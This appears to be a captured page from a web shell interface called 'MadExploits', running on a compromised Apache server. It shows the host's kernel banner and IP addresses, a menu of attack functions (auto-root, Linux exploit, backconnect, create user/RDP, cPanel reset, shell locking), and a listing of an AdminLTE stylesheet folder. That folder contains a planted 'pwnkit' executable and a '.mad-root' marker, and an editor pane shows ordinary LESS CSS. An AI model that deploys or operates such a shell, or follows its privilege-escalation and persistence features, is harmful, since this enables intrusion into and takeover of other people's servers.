Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.135.214.175
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
basarke /
myadmin /
build /
less /
[ HOME SHELL ]
Name
Size
Permission
Action
skins
[ DIR ]
drwxr-xr-x
.csslintrc
545
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
404_500_errors.less
702
B
-rw-r--r--
AdminLTE-without-plugins.less
1.54
KB
-rw-r--r--
AdminLTE.less
1.55
KB
-rw-r--r--
alerts.less
641
B
-rw-r--r--
bootstrap-social.less
3.2
KB
-rw-r--r--
boxes.less
7.92
KB
-rw-r--r--
buttons.less
3.06
KB
-rw-r--r--
callout.less
846
B
-rw-r--r--
carousel.less
268
B
-rw-r--r--
control-sidebar.less
5.37
KB
-rw-r--r--
core.less
2.77
KB
-rw-r--r--
direct-chat.less
2.98
KB
-rw-r--r--
dropdown.less
6.71
KB
-rw-r--r--
forms.less
1.85
KB
-rw-r--r--
fullcalendar.less
1.73
KB
-rw-r--r--
header.less
4.69
KB
-rw-r--r--
info-box.less
1.11
KB
-rw-r--r--
invoice.less
201
B
-rw-r--r--
labels.less
326
B
-rw-r--r--
lockscreen.less
1.12
KB
-rw-r--r--
login_and_register.less
707
B
-rw-r--r--
mailbox.less
1.19
KB
-rw-r--r--
miscellaneous.less
8.52
KB
-rw-r--r--
mixins.less
6.92
KB
-rw-r--r--
modal.less
1.27
KB
-rw-r--r--
navs.less
3.75
KB
-rw-r--r--
plugins.less
119
B
-rw-r--r--
print.less
967
B
-rw-r--r--
products.less
776
B
-rw-r--r--
profile.less
452
B
-rw-r--r--
progress-bars.less
1.64
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
select2.less
2.64
KB
-rw-r--r--
sidebar-mini.less
3.68
KB
-rw-r--r--
sidebar.less
3.04
KB
-rw-r--r--
small-box.less
1.41
KB
-rw-r--r--
social-widgets.less
1.37
KB
-rw-r--r--
table.less
897
B
-rw-r--r--
timeline.less
1.91
KB
-rw-r--r--
users-list.less
602
B
-rw-r--r--
variables.less
3.04
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : navs.less
/* * Component: Nav * -------------- */ .nav { > li > a:hover, > li > a:active, > li > a:focus { color: #444; background: #f7f7f7; } } /* NAV PILLS */ .nav-pills { > li > a { .border-radius(0); border-top: 3px solid transparent; color: #444; > .fa, > .glyphicon, > .ion { margin-right: 5px; } } > li.active > a, > li.active > a:hover, > li.active > a:focus { border-top-color: @light-blue; } > li.active > a { font-weight: 600; } } /* NAV STACKED */ .nav-stacked { > li > a { .border-radius(0); border-top: 0; border-left: 3px solid transparent; color: #444; } > li.active > a, > li.active > a:hover { background: transparent; color: #444; border-top: 0; border-left-color: @light-blue; } > li.header { border-bottom: 1px solid #ddd; color: #777; margin-bottom: 10px; padding: 5px 10px; text-transform: uppercase; } } /* NAV TABS */ .nav-tabs-custom { margin-bottom: 20px; background: #fff; box-shadow: @box-boxshadow; border-radius: @box-border-radius; > .nav-tabs { margin: 0; border-bottom-color: #f4f4f4; .border-top-radius(@box-border-radius); > li { border-top: 3px solid transparent; margin-bottom: -2px; > a { color: #444; .border-radius(0); &.text-muted { color: #999; } &, &:hover { background: transparent; margin: 0; } &:hover { color: #999; } } &:not(.active) { > a:hover, > a:focus, > a:active { border-color: transparent; } } margin-right: 5px; } > li.active { border-top-color: @light-blue; & > a, &:hover > a { background-color: #fff; color: #444; } > a { border-top-color: transparent; border-left-color: #f4f4f4; border-right-color: #f4f4f4; } } > li:first-of-type { margin-left: 0; &.active { > a { border-left-color: transparent; } } } //Pulled to the right &.pull-right { float: none !important; > li { float: right; } > li:first-of-type { margin-right: 0; > a { border-left-width: 1px; } &.active { > a { border-left-color: #f4f4f4; border-right-color: transparent; } } } } > li.header { line-height: 35px; padding: 0 10px; font-size: 20px; color: #444; > .fa, > .glyphicon, > .ion { margin-right: 5px; } } } > .tab-content { background: #fff; padding: 10px; .border-bottom-radius(@box-border-radius); } .dropdown.open > a { &:active, &:focus { background: transparent; color: #999; } } // Tab color variations &.tab-primary { > .nav-tabs { > li.active { border-top-color: @light-blue; } } } &.tab-info { > .nav-tabs { > li.active { border-top-color: @aqua; } } } &.tab-danger { > .nav-tabs { > li.active { border-top-color: @red; } } } &.tab-warning { > .nav-tabs { > li.active { border-top-color: @yellow; } } } &.tab-success { > .nav-tabs { > li.active { border-top-color: @green; } } } &.tab-default { > .nav-tabs { > li.active { border-top-color: @gray-lte; } } } } /* PAGINATION */ .pagination { > li > a { background: #fafafa; color: #666; } &.pagination-flat { > li > a { .border-radius(0) !important; } } }
Close